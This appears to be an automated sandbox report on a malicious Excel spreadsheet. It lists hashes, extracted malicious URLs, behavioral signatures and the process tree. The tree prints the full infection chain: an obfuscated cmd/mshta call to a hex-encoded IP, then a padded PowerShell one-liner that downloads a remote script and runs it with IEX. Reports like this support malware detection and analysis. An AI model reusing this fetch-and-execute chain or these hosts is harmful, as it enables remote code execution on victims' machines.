Analysis
-
max time kernel
7s -
max time network
36s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
21/01/2022, 10:23
Behavioral task
behavioral1
Sample
6407591df6ce61f946e24715faa6fba1b1f3221e2baf22f6c4f5a64f1ea98eb5.xls
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
6407591df6ce61f946e24715faa6fba1b1f3221e2baf22f6c4f5a64f1ea98eb5.xls
Resource
win10v2004-en-20220113
General
-
Target
6407591df6ce61f946e24715faa6fba1b1f3221e2baf22f6c4f5a64f1ea98eb5.xls
-
Size
71KB
-
MD5
21fc12ef8a4a4ba5b38a303fa7e70c08
-
SHA1
5700a2231371b289eae19ce62e1a73457ee582c4
-
SHA256
6407591df6ce61f946e24715faa6fba1b1f3221e2baf22f6c4f5a64f1ea98eb5
-
SHA512
8200f14c0a8023bb74b39796f7859258ef67a21a5f81704f82315695409795fe724ac8ca81513a95d50d169c824532e43865846ce42b0e541366309ace849654
Malware Config
Extracted
http://0xb907d607/fer/fe2.html
Extracted
http://185.7.214.7/fer/fe2.png
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1420 3256 cmd.exe 52 -
Program crash 1 IoCs
pid pid_target Process procid_target 3508 2472 WerFault.exe 58 -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3256 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 3256 EXCEL.EXE 3256 EXCEL.EXE 3256 EXCEL.EXE 3256 EXCEL.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\6407591df6ce61f946e24715faa6fba1b1f3221e2baf22f6c4f5a64f1ea98eb5.xls"1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3256 -
C:\Windows\SYSTEM32\cmd.execmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fe2.html2⤵
- Process spawned unexpected child process
PID:1420 -
C:\Windows\system32\mshta.exemshta http://0xb907d607/fer/fe2.html3⤵PID:2472
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fe2.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X4⤵PID:1796
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2472 -s 17284⤵
- Program crash
PID:3508
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p1⤵PID:3616
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 1fd1a4a88257bc1daca38475719cbffa mGUXW3qYd0yxlUysCV2c9A.0.1.0.0.01⤵PID:3924
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 376 -p 2472 -ip 24721⤵PID:3260